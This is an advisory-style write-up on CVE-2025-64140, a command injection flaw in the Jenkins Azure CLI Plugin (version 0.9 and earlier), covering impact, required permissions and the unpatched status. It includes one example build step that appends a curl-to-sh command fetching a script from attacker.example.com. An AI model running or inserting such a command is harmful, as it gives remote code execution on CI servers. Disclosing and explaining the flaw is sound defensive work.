Introduction
Attackers with low-level Jenkins permissions can execute arbitrary shell commands on the Jenkins controller by abusing the Azure CLI Plugin. This vulnerability directly exposes CI/CD infrastructure to remote code execution, credential theft, and supply chain compromise.
About Jenkins and the Azure CLI Plugin: Jenkins is one of the most widely adopted open source automation servers, powering continuous integration and deployment for organizations of all sizes. The Azure CLI Plugin enables Jenkins jobs to interact with Microsoft Azure resources by running Azure CLI commands as part of build steps. While not as ubiquitous as core Jenkins plugins, it is used in environments where Azure integration is critical to DevOps workflows. The plugin has not seen active development since 2018, which is relevant to its security posture.
Technical Information
CVE-2025-64140 is a command injection vulnerability (CWE-78) present in Jenkins Azure CLI Plugin version 0.9 and all earlier versions. The plugin allows users with Item/Configure permission to define Azure CLI commands to be executed during build steps. These commands are passed directly to the shell on the Jenkins controller without any validation, escaping, or restriction. As a result, an attacker can inject shell metacharacters (such as ;, &&, |) and append arbitrary commands to the legitimate Azure CLI invocation.
For example, a Jenkins job configuration might include a build step like this:
az group create --name myGroup --location eastus; curl http://attacker.example.com/shell.sh | sh
The shell interprets everything after the semicolon as a separate command, so both the Azure CLI command and the attacker's payload are executed with the privileges of the Jenkins process. This enables remote code execution, credential theft, lateral movement, and persistent compromise of the Jenkins controller.
The vulnerability is exploitable by any user with Item/Configure permission, which is often granted to developers or automation engineers in many Jenkins environments. The risk is further amplified if jobs are allowed to run on the Jenkins controller itself, rather than being isolated to remote agents.
Affected Systems and Versions
- Jenkins Azure CLI Plugin version 0.9 and all earlier versions are affected.
- Any Jenkins instance with the Azure CLI Plugin installed and jobs configured to run on the controller is vulnerable.
- Exploitation requires Item/Configure permission.
Vendor Security History
Jenkins and its plugin ecosystem have experienced multiple command injection and unsafe deserialization vulnerabilities in the past, often due to insufficient input validation or unsafe use of shell execution APIs. The Azure CLI Plugin has not been actively maintained since 2018. The vendor has not released a patch for this issue as of the advisory date.
